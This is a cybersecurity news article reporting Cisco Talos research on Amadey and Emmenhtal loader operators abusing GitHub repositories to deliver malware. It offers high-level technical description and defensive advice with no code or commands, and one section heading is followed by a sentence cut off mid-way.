GitHub Turned Into Malware Playground: Cisco Uncovers Shocking Exploit by Amadey Botnet Operators

Listen to this Post

Featured Image

GitHub Weaponized: A Startling Abuse of Trust

Security researchers from Cisco Talos have unearthed a deeply concerning cyber campaign that weaponizes public GitHub repositories to distribute powerful malware strains. Rather than relying solely on traditional email phishing, attackers have evolved their tactics, using GitHub’s trusted infrastructure to host and deliver payloads with far greater stealth. At the center of this operation are two infamous tools — the Amadey botnet and Emmenhtal loader — which were found deploying a variety of malicious programs like SmokeLoader, AsyncRAT, and Lumma. The twist? Some of these attacks required no emails at all. By directly uploading malware to GitHub, the actors took advantage of the platform’s open nature and its general allowance in enterprise environments to stealthily distribute malware as part of a broader Malware-as-a-Service (MaaS) campaign.

GitHub Repositories Used as Malware Delivery Systems

Security researchers from Cisco Talos have revealed an active malware campaign using public GitHub repositories as a distribution infrastructure. The attackers leverage the Amadey botnet and Emmenhtal loaders to infect systems with secondary malware such as SmokeLoader, Lumma, and AsyncRAT. Originally observed in phishing attacks against Ukrainian entities in early 2025, the Emmenhtal loader was initially sent as JavaScript within compressed email attachments. But the operation took a more sophisticated turn: researchers later identified Emmenhtal variants hosted directly on GitHub, bypassing email-based distribution completely.

This newer strategy allowed attackers to use GitHub as an open directory to deliver malware more discreetly. This is especially dangerous because GitHub is typically whitelisted in corporate environments, making it more difficult for security tools to detect the downloads. Cisco discovered three major GitHub accounts linked to this threat: Legendary99999 (hosting over 160 malicious repositories), DFfe9ewf (a test account with toolkits like Selenium WebDriver and DInvoke), and Milidmdds (containing JavaScript scripts and a Python variant of Emmenhtal). Each account hosted payloads designed to be fetched directly via GitHub URLs.

Technically, the Emmenhtal scripts from both phishing and GitHub campaigns share the same multi-stage architecture: heavily obfuscated JavaScript, a PowerShell launcher using ActiveXObject, AES-encrypted data blobs, and a final PowerShell downloader targeting specific IPs. One deceptive technique even involved malware disguised as MP4 video files and a Python script named checkbalance.py that pretended to check cryptocurrency balances. The goal? Trick users into executing scripts that silently download and execute malware in the background.

Cisco has reported the malicious accounts to GitHub, which quickly took action to remove them. In the meantime, Talos recommends that organizations ramp up defenses by filtering script-based attachments, monitoring PowerShell activity, and reviewing access to platforms like GitHub. Traditional perimeter defenses are no longer enough — behavioral detection and zero-trust policies are vital in identifying unusual access or download activity.

What Undercode Say:

The Rise of Trusted Infrastructure Abuse

This campaign underscores a chilling reality: cybercriminals no longer need to rely on shady domains or poorly hosted servers. They are using legitimate, trusted platforms like GitHub to conduct their malicious operations. The abuse of a widely respected developer resource like GitHub represents a dangerous evolution in threat actor strategy. It not only improves delivery success but also blurs the line between legitimate traffic and malicious activity.

Emmenhtal’s Evasion Tactics Are Evolving

The Emmenhtal

Malware-as-a-Service (MaaS) Economy Grows

This campaign appears to be deeply embedded in the MaaS ecosystem, offering plug-and-play infection kits. This reflects how professionalized and accessible cybercrime has become. Attackers no longer need advanced skills — they can buy or rent toolkits and upload them to GitHub with minimal effort, effectively turning the site into an underground distribution warehouse.

Amadey Botnet: Silent but Powerful

Amadey is known for its stealthy operations. It acts as an initial dropper, quietly downloading additional malware such as Lumma and AsyncRAT. Its ability to fetch scripts from GitHub makes it particularly stealthy. Once inside a system, it can open backdoors, harvest credentials, or add the infected device to a botnet for further exploitation.

Why GitHub is a Perfect Cover

GitHub’s legitimate status in the developer world makes it a prime target for exploitation. Most corporate firewalls and proxies don’t block GitHub traffic. This gives malware a green light to enter otherwise secured environments, hiding in plain sight. Attackers are now treating it like a CDN for malware.

What Makes These Loaders So Dangerous

The combination of PowerShell, JavaScript, and encrypted blobs ensures that signature-based antivirus tools are ineffective. The campaign cleverly leverages file disguises, such as fake MP4s and Python scripts, to appeal to both curious users and untrained employees.

Organizational Blind Spots Exposed

The success of this campaign reveals major gaps in organizational cybersecurity — specifically, PowerShell monitoring, script execution policies, and repository control. Even tech-savvy environments may lack alerting mechanisms for unusual GitHub activity, making them soft targets.

Lessons from the Ukraine-Focused Phishing

While the campaign initially targeted Ukrainian organizations, the global reach of GitHub means this threat is not geographically constrained. If anything, the initial campaign served as a sandbox, with future attacks potentially targeting corporations worldwide.

Remediation and Policy Overhaul Needed

Organizations should audit and restrict GitHub access, especially for endpoints that don’t require it. Behavior-based detection systems, combined with strict PowerShell logging and sandboxed execution environments, can significantly lower the risk.

The Bigger Picture: Supply Chain Risk

Using GitHub as a malware source also raises concerns about supply chain compromise. Developers might unknowingly integrate poisoned repositories or tools into their applications. This weaponization of developer trust could have long-term effects across industries.

🔍 Fact Checker Results:

✅ GitHub was indeed used as a malware delivery platform, confirmed by Cisco Talos.
✅ Amadey and Emmenhtal loaders were actively involved, delivering known malware strains.
✅ GitHub took down the malicious repositories shortly after being notified.

📊 Prediction:

🚨 Expect more cybercrime groups to abuse trusted platforms like GitHub as part of their delivery ecosystem.
💻 Organizations will increasingly need to monitor developer tool usage just like traditional endpoints.
🛡️ Future threats may come disguised as legitimate DevOps utilities, making zero-trust policies a necessity.

References:

Reported By: www.infosecurity-magazine.com
Extra Source Hub:
https://www.digitaltrends.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin